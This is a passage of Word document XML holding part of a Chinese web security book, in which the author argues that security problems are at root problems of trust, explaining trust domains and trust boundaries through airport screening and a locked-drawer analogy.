          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="223"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:name="1.3  返璞归真，揭秘安全的本质" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>要入侵系统，找到对他们有价值的数据，因此黑帽子只需要以点突破，找到对他们最有用的一点，以此渗透，因此思考问题的出发点必然是有选择性的、微观的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>从对待问题的角度来看，黑帽子为了完成一次入侵，需要利用各种不同漏洞的组合来达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>目的，是在不断地组合问题；而白帽子在设计解决方案时，如果只看到各种问题组合后产生的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>效果，就会把事情变复杂，难以细致入微地解决根本问题，所以白帽子必然是在不断地分解问题，再对分解后的问题逐个予以解决。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="214" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>这种定位的不对称，也导致了白帽子的安全工作比较难做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>。“破坏永远比建设容易”，但凡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>事都不是绝对的。要如何扭转这种局面呢？一般来说，白帽子选择的方法，是克服某种攻击方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>法，而并非抵御单次的攻击。比如设计一个解决方案，在特定环境下能够抵御所有已知的和未</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
        </w:rPr>
        <w:t>知的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>问题。假设这个方案的实施周期是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>个月，那么执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>个月后，所有的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>问题都得到了解决，也就意味着黑客再也无法利用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>这一可能存在的弱点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>入侵网站了。如果做到了这一点，那么白帽子们就在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>的局部对抗中化被动为主动了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>但这一切都是理想状态，在现实世界中，存在着各种各样不可回避的问题。工程师们很喜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>欢一句话：“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>！”，在安全领域也普遍认为：“最大的漏洞就是人！”。写得再好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>的程序，在有人参与的情况下，就可能会出现各种各样不可预知的情况，比如管理员的密码有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>可能泄露，程序员有可能关掉了安全的配置参数，等等。安全问题往往发生在一些意想不到的地方。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="151"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>另一方面，防御技术在不断完善的同时，攻击技术也在不断地发展。这就像一场军备竞赛， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>看谁跑在前面。白帽子们刚把某一种漏洞全部堵上，黑帽子们转眼又会玩出新花样。谁能在技</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>术上领先，谁就能占据主动。互联网技术日新月异，在新技术领域的发展中，也存在着同样的博弈过程。可现状是，如果新技术不在一开始就考虑安全设计的话，防御技术就必然会落后于攻击技术，导致历史不断地重复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250013" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>返璞归真，揭秘安全的本质</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="299"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>讲了很多题外话，最终回到正题上。这是一本讲 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>安全的书，在本书中除了讲解必要的攻击技术原理之外，最终重心还是要放在防御的思路和实现的技术上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>在进行具体技术的讲解之前，我们需要先清楚地认识到“安全的本质”，或者说，“安全问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-47"/>
        </w:rPr>
        <w:t>题的本质 ”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>安全是什么？什么样的情况下会产生安全问题？我们要如何看待安全问题？只有搞明白</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>了这些最基本的问题，才能明白一切防御技术的出发点，才能明白为什么我们要这样做，要那样做。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>在武侠小说中，一个真正的高手，对武功有着最透彻、最本质的理解，达到了返璞归真的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>境界。在安全领域，笔者认为搞明白了安全的本质，就好比学会了“独孤九剑”，天下武功万</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>变不离其宗，遇到任何复杂的情况都可以轻松应对，设计任何的安全方案也都可以信手拈来了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>那么，一个安全问题是如何产生的呢？我们不妨先从现实世界入手。火车站、机场里，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>乘客们开始正式旅程之前，都有一个必要的程序：安全检查。机场的安全检查，会扫描乘客的行李箱，检查乘客身上是否携带了打火机、可燃液体等危险物品。抽象地说，这种安全检查， 就是过滤掉有害的、危险的东西。因为在飞行的过程中，飞机远离地面，如果发生危险，将会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>直接危害到乘客们的生命安全。因此，飞机是一个高度敏感和重要的区域，任何有危害的物品都不应该进入这一区域。为达到这一目标，登机前的安全检查就是一个非常有必要的步骤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>从安全的角度来看，我们将不同重要程度的区域划分出来：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="2536">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1988820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>116431</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1558059" cy="1710213"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="9" name="image6.jpeg" descr="cid:image007.png@01CCEFE2.AFB05CC0"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="10" name="image6.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1558059" cy="1710213"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="169"/>
        <w:ind w:left="2934" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>安全检查的过程按照需要进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>通过一个安全检查</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>过滤、净化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>的过程，可以梳理未知的人或物，使其变得可信任。被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>划分出来的具有不同信任级别的区域，我们称为信任域，划分两个不同信任域之间的边界，我们称为信任边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="302" w:lineRule="auto" w:before="159"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>数据从高等级的信任域流向低等级的信任域，是不需要经过安全检查的；数据从低等级的信任域流向高等级的信任域，则需要经过信任边界的安全检查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>我们在机场通过安检后，想要从候机厅出来，是不需要做检查的；但是想要再回到候机厅， 则需要再做一次安全检查，就是这个道理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="158"/>
        <w:ind w:left="604" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>笔者认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，安全问题的本质是信任的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>一切的安全方案设计的基础，都是建立在信任关系上的。我们必须相信一些东西，必须有一些最基本的假设，安全方案才能得以建立；如果我们否定一切，安全方案就会如无源之水， 无根之木，无法设计，也无法完成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>举例来说，假设我们有份很重要的文件要好好保管起来，能想到的一个方案是把文件“锁” 到抽屉里。这里就包含了几个基本的假设，首先，制作这把锁的工匠是可以信任的，他没有私</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="304" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="148"/>
        <w:ind w:left="203" w:right="221"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>自藏一把钥匙；其次，制作抽屉的工匠没有私自给抽屉装一个后门；最后，钥匙还必须要保管</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>在一个不会出问题的地方，或者交给值得信任的人保管。反之，如果我们一切都不信任，那么也就不可能认为文件放在抽屉里是安全的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="159"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>当制锁的工匠无法打开锁时，文件才是安全的，这是我们的假设前提之一。但是如果那个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>工匠私自藏有一把钥匙，那么这份文件也就不再安全了。这个威胁存在的可能性，依赖于对工</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>匠的信任程度。如果我们信任工匠，那么在这个假设前提下，我们就能确定文件的安全性。这种对条件的信任程度，是确定对象是否安全的基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="163"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>在现实生活中，我们很少设想最极端的前提条件，因为极端的条件往往意味者小概率以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>高成本，因此在成本有限的情况下，我们往往会根据成本来设计安全方案，并将一些可能性较大的条件作为决策的主要依据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>比如在设计物理安全时，根据不同的地理位置、不同的政治环境等，需要考虑台风、地震、战争等因素。但在考虑、设计这些安全方案时，根据其发生的可能性，需要有不同的侧重点。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>比如在大陆深处，考虑台风的因素则显得不太实际；同样的道理，在大陆板块稳定的地区，考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>虑地震的因素也会带来较高的成本。而极端的情况比如“彗星撞击地球后如何保证机房不受影响”的问题，一般都不在考虑之中，因为发生的可能性太小。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>从另一个角度来说，一旦我们作为决策依据的条件被打破、被绕过，那么就会导致安全假</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>设的前提条件不再可靠，变成一个伪命题。因此，把握住信任条件的度，使其恰到好处，正是设计安全方案的难点所在，也是安全这门学问的艺术魅力所在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250012" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>破除迷信，没有银弹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="299"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
